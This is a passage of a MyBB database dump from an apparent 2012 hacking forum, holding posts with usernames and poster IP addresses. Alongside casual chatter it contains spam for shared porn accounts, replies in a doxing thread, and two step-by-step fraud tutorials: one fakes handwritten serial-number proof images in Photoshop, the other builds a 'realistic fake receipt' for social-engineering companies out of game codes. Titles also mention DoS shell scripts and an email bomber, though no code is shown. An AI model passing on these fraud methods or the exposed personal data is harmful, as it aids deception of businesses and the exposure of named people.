\r\n\r\nFor a laugh check it out.', '72.231.24.165', '1223104677', '1', '0', '1', '1350790141', '1', 'ace099e83d9e07631b94758e0ae8158e', '0', '1350790141'); INSERT INTO mybb_posts VALUES('5667', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '222', 'Exposé', '1350707472', 'Thanks for the updates Jok3r. And I would like to help in getting the theme situated. I think all we need is a new header/logo and we will be all set. And congrats to all new staff members :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '72b5f27ce831eefeac277a4fd5b2179f', '0', '0'); INSERT INTO mybb_posts VALUES('5668', '1003', '0', '54', '[20 Oct ] Premium Elite XXX Passes, All Checked And Working!!!', '0', '255', 'sbhshroy2', '1350708264', 'click here http://adf.ly/DrLBX', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'cc1a1027c299a592ca0056755668c798', '0', '0'); INSERT INTO mybb_posts VALUES('5669', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350708319', 'Thanks for the updates and thanks for informing everyone.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '920b70d570ddeafd72c1ea11e1ee35c8', '0', '0'); INSERT INTO mybb_posts VALUES('5670', '1004', '0', '54', '[20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '17', '255', 'sbhshroy2', '1350708713', 'click here http://adf.ly/DrLfN', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', '0eb8b3c94e4f4490dc9196ff6a21fc44', '0', '0'); INSERT INTO mybb_posts VALUES('5671', '1001', '5660', '7', 'RE: Shady URL', '0', '3', '??????????¢™', '1350708827', 'LOL this is so funny, Nice share mothered.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '1272667da23d0857c1173366ca7c177a', '0', '0'); INSERT INTO mybb_posts VALUES('5672', '1005', '0', '54', '[20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '17', '255', 'sbhshroy2', '1350709115', 'click here http://adf.ly/DrM5O', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', '8a93548582e7e2ec620556024fdcd472', '0', '0'); INSERT INTO mybb_posts VALUES('5673', '906', '5575', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350709122', '[quote=\'sirchamp\' pid=\'5575\' dateline=\'1350640448\']\r\nBeeing banned of HF must be really fucked up.\r\n[/quote]\r\n\r\nActually it\'s good to be away from skids.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '54bcc4028627bdd1d93292653458fc9f', '0', '0'); INSERT INTO mybb_posts VALUES('5674', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '9', 'p420', '1350709214', 'Nice updates. I try to come online but can\'t sometimes.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '393ed1cf6344a61da1e31739fc948229', '0', '0'); INSERT INTO mybb_posts VALUES('5675', '906', '5576', '42', 'RE: DOX of Kody Maxson', '0', '9', 'p420', '1350709260', '[quote=\'R?????zo?\' pid=\'5576\' dateline=\'1350641378\']\r\nMy thread gets deleted on HF, i think they don\'t allow Dox\r\n[/quote]\r\n\r\nYeah they don\'t allow DOX infos.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e918a36e901e495209092520a52f5174', '0', '0'); INSERT INTO mybb_posts VALUES('5623', '896', '5499', '23', 'RE: How to secure your Router', '0', '264', 'D?ea', '1350677402', '[quote=\'ƒ???????????g\' pid=\'5499\' dateline=\'1350608178\']\r\nLmao I could still hack your router but k...:P\r\n[/quote]\r\nHow would you do that? - Without getting me to visit a website or open a program.', '87.55.196.22', '1463272470', '1', '0', '0', '0', '1', '9021b0927eaa54055903fc9975204c1d', '0', '0'); INSERT INTO mybb_posts VALUES('5624', '889', '4842', '3', 'RE: Vote for a new theme', '0', '257', 'XxTREYZxX', '1350677643', 'yeah this theme is fine, but then again we need a change every now and then>', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '282bf95d3bbc4d8aa296af80b0b6470b', '0', '0'); INSERT INTO mybb_posts VALUES('5625', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '257', 'XxTREYZxX', '1350678095', 'this is all i know \nHTML, CSS, and Java.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'f555d300dfd31c0f5f46d1f07ba8e455', '0', '0'); INSERT INTO mybb_posts VALUES('5626', '985', '5554', '7', 'RE: World\'s Longest Email Address', '0', '257', 'XxTREYZxX', '1350678781', '[quote=\'R?????zo?\' pid=\'5554\' dateline=\'1350632999\']\r\nHahah I\'ve heard of this before but I never thought of actually using it haha\r\nLike doing buisness, \'whats your paypal?\'\r\nHere you go: \'hauabaf@abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com\' haha\r\n[/quote]\r\n\r\nbahaha yeah that would be funny as', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '708cb8ff15ddd8286ce4977e3ede5cbb', '0', '0'); INSERT INTO mybb_posts VALUES('5627', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '257', 'XxTREYZxX', '1350679055', 'umm your name is not delta force *facepalm ahah lol \nback to topic thanks for the great share', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0a784afce56b6b46bf396f9cd9ec88b6', '0', '0'); INSERT INTO mybb_posts VALUES('5676', '1006', '0', '54', 'playboy premium acount for lifetime', '17', '255', 'sbhshroy2', '1350709799', 'click here http://adf.ly/DrMx1', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'd25532ee24431318b996db82a36a5698', '0', '0'); INSERT INTO mybb_posts VALUES('5677', '896', '4892', '23', 'RE: How to secure your Router', '0', '222', 'Exposé', '1350710086', 'Why do I need you to visit anything....? I can use a couple of programs that I have lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ff4ae4fe00d5bbfe2eb0e625445e308', '0', '0'); INSERT INTO mybb_posts VALUES('5678', '1007', '0', '54', 'uncommonporn premium acounts', '0', '255', 'sbhshroy2', '1350710106', 'click here http://adf.ly/DrNWp', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'cb8c0b384a163517f2500a13632369f0', '0', '0'); INSERT INTO mybb_posts VALUES('5679', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '258', 'PiXEL^OG', '1350710838', 'WTF im Deltaforce from Ubers , I wrote this like a year ago on ubers some fucking skid must have leeched it to techotoys.net', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '200cddf155f9ad885b686399eb474bb6', '0', '0'); INSERT INTO mybb_posts VALUES('5680', '1002', '5674', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350710866', '[quote=\'p420\' pid=\'5674\' dateline=\'1350709214\']\r\nNice updates. I try to come online but can\'t sometimes.\r\n[/quote]\r\n\r\nIts okay, we understand people may have trouble at home or whatever the case may be so we really dont panic or whatever. The only time is if you are a staff or an admin.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e81653d9e651396119da2de0a972e95a', '0', '0'); INSERT INTO mybb_posts VALUES('5681', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350710879', 'I will soon , i might even become more active here :D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8f6729b1f7f02a9fafbf2f0010218bb7', '0', '0'); INSERT INTO mybb_posts VALUES('5682', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '222', 'Exposé', '1350711147', 'God I absolutely hate this dam song....it just pisses me off. IDK WHY', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'fce4277794d63e13e3170431f66ffb76', '0', '0'); INSERT INTO mybb_posts VALUES('5683', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '258', 'PiXEL^OG', '1350713685', 'Username : XTr3ME PiX3L\nName : Classified \nAge : 15\nProfile : http://l33thacking.net/user-258.html\n\nWhy I should join Gamers : Because i own the PS3 Xbox 360 and a PSP Vita. I also play on PC when playing an older game or CS:GO. I have been gaming for almost 8 years since i was 9. I have a Modded xbox 360 so i don\'t buy games , i download but if there is a game i really want then i buy it to support the developers. So yeah i play alot lol', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'fe30e9b38b389387baaf1285815462d6', '0', '0'); INSERT INTO mybb_posts VALUES('5684', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '62', 'R?????zo?', '1350723976', 'Thanks, i take no credits though. Just sharing :)', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'c48e5a6a624ff1436c48c307489e198c', '0', '0'); INSERT INTO mybb_posts VALUES('5685', '1001', '5660', '7', 'RE: Shady URL', '0', '62', 'R?????zo?', '1350724453', 'Nice share bro hahah, can troll friends now :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'af983932101fea7bbc9a3384147f84c5', '0', '0'); INSERT INTO mybb_posts VALUES('5686', '1005', '5672', '54', 'RE: [20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '0', '62', 'R?????zo?', '1350724515', 'Thanks for sharing this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '10afda3e631bd3996a6dc68afe780846', '0', '0'); INSERT INTO mybb_posts VALUES('5687', '1006', '5676', '54', 'RE: playboy premium acount for lifetime', '0', '62', 'R?????zo?', '1350724549', 'Thanks for sharing this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'dc7f3b88d66cc3a95f413fac0427c9ac', '0', '0'); INSERT INTO mybb_posts VALUES('5688', '1007', '5678', '54', 'RE: uncommonporn premium acounts', '0', '62', 'R?????zo?', '1350724588', 'Thanks again bro, keep it up.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '94c5a469d020fd08a13c0548b97c1cc2', '0', '0'); INSERT INTO mybb_posts VALUES('5689', '1004', '5670', '54', 'RE: [20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '0', '62', 'R?????zo?', '1350724622', 'Thanks for this, +rep you.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e3c0808aa6ad19093b42b47c8686249e', '0', '0'); INSERT INTO mybb_posts VALUES('5690', '1001', '5660', '7', 'RE: Shady URL', '0', '258', 'PiXEL^OG', '1350724696', 'Credits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '87872f9ff6e804f9ca601dccfd5fe8d1', '0', '0'); INSERT INTO mybb_posts VALUES('5691', '896', '4892', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350724867', 'I would like to see that in action, maybe you could make a tutorial about it :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '088d6a52c1fe0670933b56d064c90a3c', '0', '0'); INSERT INTO mybb_posts VALUES('5692', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350726592', 'Still works, thanks again :D\nBookmarked too!', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'a71789a4563c8ae8aac7bb8a8c1e8e47', '0', '0'); INSERT INTO mybb_posts VALUES('5693', '999', '5650', '67', 'RE: [Guide] How To Setup A PHP DoS (Shell) Script', '0', '62', 'R?????zo?', '1350726684', 'Looks interesting, bookmarked to use later, might come handy.\nThanks bro, keep it up.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '4849cbd12b0ca8b6e15e4a54c2429cda', '0', '0'); INSERT INTO mybb_posts VALUES('5694', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '62', 'R?????zo?', '1350726727', 'Looks nice, thanks for this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e4fd136083df0214d8013235fd0c39e1', '0', '0'); INSERT INTO mybb_posts VALUES('5695', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350726800', 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com\n\nLol this is the longest mail site :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '5abea575cfb21a5412b94a2f685a9bb4', '0', '0'); INSERT INTO mybb_posts VALUES('5696', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '62', 'R?????zo?', '1350726868', 'Sounds nice, I will check it once I have time.\nThanks for this.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'adef487d86b05e889ba70e8e989a644b', '0', '0'); INSERT INTO mybb_posts VALUES('5697', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '62', 'R?????zo?', '1350726910', 'Looks legit, thanks bro.\nMight come handy sometime.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '15d6d9450145a99f8e2de8ce895e8c61', '0', '0'); INSERT INTO mybb_posts VALUES('5698', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350727169', 'Thanks for the updates looks nice, also lol\'ed on the last bonus pic.\nBtw the DDoS\'ers userbar is broken and forum icon is broken, also we need a clean up on the threads that\'s in there, since they are all related to Rat\'ing.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e19087a96ba60762c5d9c1d1152bf93f', '0', '0'); INSERT INTO mybb_posts VALUES('5699', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '228', 'VirtualLegend', '1350728052', 'lol NXK Pushed Rave', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5e3d75124d4a919437c754d1e8af3bbd', '0', '0'); INSERT INTO mybb_posts VALUES('5700', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1350729581', 'ƒ???????????g.....my username....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f406b2d09678773eef206f10eff85949', '0', '0'); INSERT INTO mybb_posts VALUES('5701', '126', '315', '15', 'RE: Adf.ly Bot', '0', '228', 'VirtualLegend', '1350729988', 'Looks great, and this bot will make you money', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c3222dd66261676547cf7dc2e17744dd', '0', '0'); INSERT INTO mybb_posts VALUES('5702', '1008', '0', '24', 'Desktop or Lappy?', '0', '205', 'mothered', '1350732548', 'Greetings to all,\r\n\r\nI couldn\'t find this by title In the search results, so I assume It has yet to be posted. Pretty simple, what do you prefer and Why? Desktop or Laptop?\r\n\r\nAs some of you might be aware, I only deal with lappies, and have quite a few of them. Why? Because of their portability, and compact enough to be carried anywhere around the home, hence can do my computational stuff where ever I\'m situated. Also, their sleek design Is very attractive.\r\n\r\nYou guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4e869d51a69495248083ef0a950c840f', '0', '0'); INSERT INTO mybb_posts VALUES('5703', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '205', 'mothered', '1350732798', 'I\'ve used Metasploit via BackTrack many times, and the email harvester does return great results.\r\n\r\nIn some cases though, there are zero results, but most work just fine.\r\nGood contribution mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cdac30b6111611cc4e25d5457ea7aa85', '0', '0'); INSERT INTO mybb_posts VALUES('5704', '987', '5703', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350735519', '[quote=\'mothered\' pid=\'5703\' dateline=\'1350732798\']\r\nI\'ve used Metasploit via BackTrack many times, and the email harvester does return great results.\r\n\r\nIn some cases though, there are zero results, but most work just fine.\r\nGood contribution mate, thanks.\r\n[/quote]\r\n\r\nYour welcome Mothered :) , Try and guess who i am? i know you from UB', '198.144.116.52', '-963611596', '0', '0', '0', '0', '1', '089e62d662482b9dd75fe76edbc0b6ae', '0', '0'); INSERT INTO mybb_posts VALUES('5705', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350736574', 'lappy all the way because its way more Convenient and just my swag :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7d23937649d244a16cbd0a998d1a0532', '0', '0'); INSERT INTO mybb_posts VALUES('5706', '1008', '5705', '24', 'RE: Desktop or Lappy?', '0', '258', 'PiXEL^OG', '1350736748', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\']\nlappy all the way because its way more Convenient and just my swag :)\n[/quote]\n\nlol you don\'t have SWAG :roflol:\n\n[spoiler]jk[/spoiler]', '198.144.116.52', '-963611596', '0', '0', '258', '1350736771', '1', '6f446005a3d87c1f3c206be276c42049', '0', '1350736771'); INSERT INTO mybb_posts VALUES('5707', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '62', 'R?????zo?', '1350736814', 'I use desktop for gaming and laptop for work/buisness.\nWhy?\nDesktop: more comfortable and higher performance to game\nLaptop: Carry where I want basicly :P', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '85f813557c4cd1633585c21663f5a19a', '0', '0'); INSERT INTO mybb_posts VALUES('5708', '1008', '5706', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350737111', '[quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\']\r\n[quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\']\r\nlappy all the way because its way more Convenient and just my swag :)\r\n[/quote]\r\n\r\nlol you don\'t have SWAG :roflol:\r\n\r\n[spoiler]jk[/spoiler\r\n\r\nhaha your very funny. \r\nlol :O)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '21efd5fded1e76c86d9b78c16c1338ed', '0', '0'); INSERT INTO mybb_posts VALUES('5709', '1008', '5708', '24', 'RE: Desktop or Lappy?', '0', '258', 'PiXEL^OG', '1350737763', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5708\' dateline=\'1350737111\']\r\n[quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\']\r\n[quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\']\r\nlappy all the way because its way more Convenient and just my swag :)\r\n[/quote]\r\n\r\nlol you don\'t have SWAG :roflol:\r\n\r\n[spoiler]jk[/spoiler\r\n\r\nhaha your very funny. \r\nlol :O)\r\n[/quote]\r\n\r\nlol i was joking :)', '198.144.116.52', '-963611596', '0', '0', '0', '0', '1', '991192aab08e59da9bfec148ae66c2a8', '0', '0'); INSERT INTO mybb_posts VALUES('5710', '1009', '0', '74', 'minecraft server setup tut', '0', '257', 'XxTREYZxX', '1350737882', '[color=#1E90FF]1. go here\r\n.https://secure.logmein.com/products/Hamachi/download.aspx\r\n2. Download the unmanaged version.\r\n3. Install it\r\n4. Open it up \r\n5. Set up a new network and call it what you want your server to be called\r\n6. Make password\r\n7. Go here: http://www.minecraft.net/download and download Minecraft_Server.exe\r\n8. Make a new folder on your desktop and place the Minecraft_Server.exe there\r\n9. Editing the properties:\r\nWhere it says \"server-ip=\" type your IP from Hamachi\r\nWhere it says \"Gamemode=\" Type 0 for Survival, 1 for Creative, and 2 for Adventure\r\nWhere it says \"Max Players\" Type how many people you want on your server at once.\r\nWhere it says \"Difficulty\" Type 1 for Easy, 2 for Normal. and 3 for Hardcore\r\nWhere it says \"Level Seed\" Type the seed you want for your server\r\nWhere it says \"Motd\" Type the message you want people to see when connecting to your server\r\nThose are the properties that are needed to be edited. The other properties are optional, although seed is optional too.\r\n10.Open Minecraft_Server.exe\r\n11. Let it run, when it says \"Done!\" continue to 12\r\n12. Open Minecraft, click Multiplayer.\r\n13. Type IP address from Hamachi\r\n14. Your server should be running perfectly fine now! \r\n\r\nthanks hope you enjoy :)[/color]', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '33e9b80218f12799f430db3a25eab08b', '0', '0'); INSERT INTO mybb_posts VALUES('5711', '1010', '0', '44', '[TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '62', 'R?????zo?', '1350738603', 'IMPORTANT READ ME! USE CAPITAL LETTER FOR YOUR TEXT IT TURNS OUT A MILLION TIMES BETTER!\n\nI decided to make a tutorial on faking these images so here it is! This is my first tutorial and I am not that experienced a photoshop but. Oh well!\n\nI did not mention but try to use CAPITAL letter for your text it has a better outcome! Also when doing your lines over the text try and create \"double lines\" have a look in the final image to see what I mean!\n\nRequirements:\n-Photoshop(I use CS6)\n\nFirst off find the product you want then search either youtube or google for reviews on the product such as this(I prefer youtube as it is harder for the companies to find the image)\n[spoiler][img]http://i45.tinypic.com/34dopzr.png[/img][/spoiler]\n\nThen find a video you like and screenshot the image. Once screenshotted put the image into photoshop.\n[spoiler][img]http://i50.tinypic.com/2hy8ff8.png[/img][/spoiler]\n\nWhen in photoshop add a text box then type in the text you wan\'t to use then curve the text for a better effect with the curve button shown in the image.(It is highlighted in red) Give the image a slight curve but don\'t overdo it.\n[spoiler][img]http://i48.tinypic.com/2iswdqh.png[/img][/spoiler]\n\nOnce you have found a curve which fits nicely you now how to find a good handwriting font! Try looking here: http://www.dafont.com/theme.php?cat=603 Once the text is in that font go over it with the brush tool! I recommend using a bigger brush size and extending some of the letters making them more rough.\n[spoiler][img]http://i47.tinypic.com/ajpb9w.png[/img][/spoiler]\n\nOnce you think it looks good make sure the layer with your text/brush is selected then go to \"Edit\" then to \"Puppet Warp\" Drag the letters up and down etc. To make it look more like handwriting! Again do it very subtly and don\'t overdo it! Once done click Apply when the box pops up!\n[spoiler][img]http://i46.tinypic.com/35029nl.png[/img][/spoiler]\n\nNow we are nearly there! Click the eraser tool make the brush size about 1/5th the height of the text or smaller. Then go to Opacity and set it to like 25-35% and go over bits of the text (Not all of it only bits!) to texturize it. I recommend zooming in to help. You can go over bits twice but on do this once or twice as it lightens that area dramatically! It should look something like this.\n[spoiler][img]http://i50.tinypic.com/f374m0.png[/img][/spoiler]\n\nNow right click the text/brush layer and go to blending options. Go to \"Drop Shadow\" and set the size to 0 and the spread to like 0-5. Then set the distance so the shadow moves quite far down the page like in my image below.\n[spoiler][img]http://i48.tinypic.com/25h0cgj.png[/img][/spoiler]\n\nNow simply drag your text off the edge of the image so only the shadow is visible then place the shadow where you want to.\n[spoiler][img]http://i49.tinypic.com/2n8atsj.png[/img][/spoiler]\n\nAnd that is basically it! You just need to mess around with settings a bit to get it perfect! You could try adding a blur to it etc.\nThis is what I got in the end!\n[spoiler][img]http://i48.tinypic.com/jhsxut.png[/img][/spoiler]\n\nRemember use CAPITAL LETTER I really can\'t stress that enough! :L\n\nI hope I helped!\n\nCredits to: REGISTRAION', '188.140.4.193', '-1131674431', '1', '0', '62', '1350743194', '1', '7f383389a9cc248bfb6df42b3ee6c1aa', '0', '1350743194'); INSERT INTO mybb_posts VALUES('5712', '1008', '5709', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350738763', '[quote=\'XTr3ME PiX3L\' pid=\'5709\' dateline=\'1350737763\']\r\n[quote=\'xEP1C_SC0P3Sx\' pid=\'5708\' dateline=\'1350737111\']\r\n[quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\']\r\n[quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\']\r\nlappy all the way because its way more Convenient and just my swag :)\r\n[/quote]\r\n\r\nlol you don\'t have SWAG :roflol:\r\n\r\n[spoiler]jk[/spoiler\r\n\r\nhaha your very funny. \r\nlol :O)\r\n[/quote]\r\n\r\nlol i was joking :)\r\n[/quote]\r\n \r\nyeah i realized that when i clicked the spoiler lol :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'f92f313931e95bc2cd58b961215a413a', '0', '0'); INSERT INTO mybb_posts VALUES('5713', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '257', 'XxTREYZxX', '1350738989', 'thanks for the great share bud keep up the good work mate :L', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0a77297f24add653167f2cd57ba74add', '0', '0'); INSERT INTO mybb_posts VALUES('5714', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '62', 'R?????zo?', '1350743225', 'Thanks, added spoilers so It\'s better to understand :P', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'bfb981aee308ab2f613abc5f0764a145', '0', '0'); INSERT INTO mybb_posts VALUES('5715', '1011', '0', '44', '[TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350743760', '[align=center]Hi guys, today I am going to show you how I make my fake receipts.\r\nThis comes in very handy in all sorts of situation when SE\'ing. \r\nBtw in this tutorial i am using Paint.NET\r\nNote: The receipt shown in the tutorial is what I used for getting Game codes from EA. I think the method is now patched.\r\n\r\n[size=large][b]Step 1.[/b][/size]\r\n[size=medium]The Receipt [/size]\r\nGet yourself over to http://www.customreceipt.com/Fill out the form and get your receipt. You will want to find a small company, as the receipts made by the generator are pretty basic, so I go for independent shops in small towns as they are more likely to have the cheap, older tills which produced receipts like these. Once you have found a suitable company use there name and address on the receipt.\r\nWith a bit of basic MS paint work you can get it looking something like this:\r\n\r\n[img]http://img839.imageshack.us/img839/8237/receiptz.jpg[/img]\r\n\r\n[size=large][b]Step 2.[/b][/size]\r\n[size=medium]The crinkle\'s[/size]\r\n\r\nIn this stage we add some crinkle to your receipt to make it look like its been in your pocket or wallet.\r\nGoogle \'Crinkled Paper\' and a picture like this will do the job:\r\n\r\n[img]http://i.istockimg.com/file_thumbview_approve/163282/2/stock-photo-163282-high-res-wrinkled-paper-background.jpg[/img]\r\n\r\nCrop it down to size and paste it into a new layer above the original receipt\r\nYou should have something looking like this:\r\n\r\n[img]http://img848.imageshack.us/img848/2200/91728553.png[/img]\r\n\r\nDrag the new \'crinkled paper\' image over the whole receipt and then lower the opacity so you can see both images.\r\nYou should now have something looking like this:\r\n\r\n[img]http://img171.imageshack.us/img171/3449/25703749.png[/img]\r\n\r\n[b][size=large]Step 3.[/size][/b]\r\n[size=medium]The gradient[/size]\r\n\r\nI do this stage to make it look like you have scanned the image in, Its entirely up to you whether you choose to do it or now.\r\nCreate a new layer and click the gradient option, drag from one corner to the other, or from one side to an other. Remember to alter the opacity so you can see the receipt and the crinkle behind it.\r\nIt should look something like this:\r\n\r\n[img]http://img847.imageshack.us/img847/6060/85873282.png[/img]\r\n\r\nThanks for reading, and I hope this helped you out![/align]', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '3f362c39e484f74def8af3585f78ef9e', '0', '0'); INSERT INTO mybb_posts VALUES('5716', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350745811', 'NXK pushed Rave. \n\nWhy? \n\n:o\n\nWhat about my demotion? Can you explain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5074d08a36570599a5b3d894480d1eeb', '0', '0'); INSERT INTO mybb_posts VALUES('5717', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350745857', 'Not working for me :p\n\nI didn\'t touch any of em.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4e0f8d1637cf44a3a73ae4aba15ffc5', '0', '0'); INSERT INTO mybb_posts VALUES('5718', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350745904', 'Doesn\'t work.\nImage is broken... \nHow much times I gotta say to fix your grammar and spelling?\n\nStart with a capital. And capital I etc..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de9cc806583d80bb94d1d0370a76e3ce', '0', '0'); INSERT INTO mybb_posts VALUES('5719', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350746029', 'Close it then....\n\nDon\'t spam with useless posts please.\n\n\"lol i was just about to close it.\"\n\nAnd fix your grammar. I don\'t wanna see any LQ posts on a HQ forum. \nYou\'re causing all of this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df54816ced421364292e4ddbbad168c3', '0', '0'); INSERT INTO mybb_posts VALUES('5720', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '62', 'R?????zo?', '1350746357', 'yeah does not work :/\nsomeone might changed the password.', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'a42c3b766837a407bb84440d907cb3b2', '0', '0'); INSERT INTO mybb_posts VALUES('5721', '1012', '0', '16', 'Huge SE Dump', '0', '62', 'R?????zo?', '1350746764', 'Loads of methods inside, have a look.\r\n\r\n[Spoiler][img]http://i.imgur.com/mbhMR.png[/img][/spoiler]\r\nTheres more then this inside, check it out :)\r\n\r\nHeres the link: http://www.mediafire.com/?1rxgu9g9wicy2oi', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '6def0f3cbabde7df2b561e2f9782caa7', '0', '0'); INSERT INTO mybb_posts VALUES('5722', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '2', 'Apathy', '1350747050', 'Awesome share thanks man.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5c5c3783d64ef836a33801c0dd6135e6', '0', '0'); INSERT INTO mybb_posts VALUES('5723', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '2', 'Apathy', '1350747148', 'Why do you guys bother so much? She sleept with a man who was dating someone else. Not cool.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a5ea8410faafd7f9dccaa4944f1e327f', '0', '0'); INSERT INTO mybb_posts VALUES('5724', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '2', 'Apathy', '1350747281', 'Not a bad tutorial but looks pretty fake still.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'd54a72600dc6a3142c913acd8f101c1a', '0', '0'); INSERT INTO mybb_posts VALUES('5725', '1002', '5716', '3', 'RE: New mods and forum updates', '0', '53', 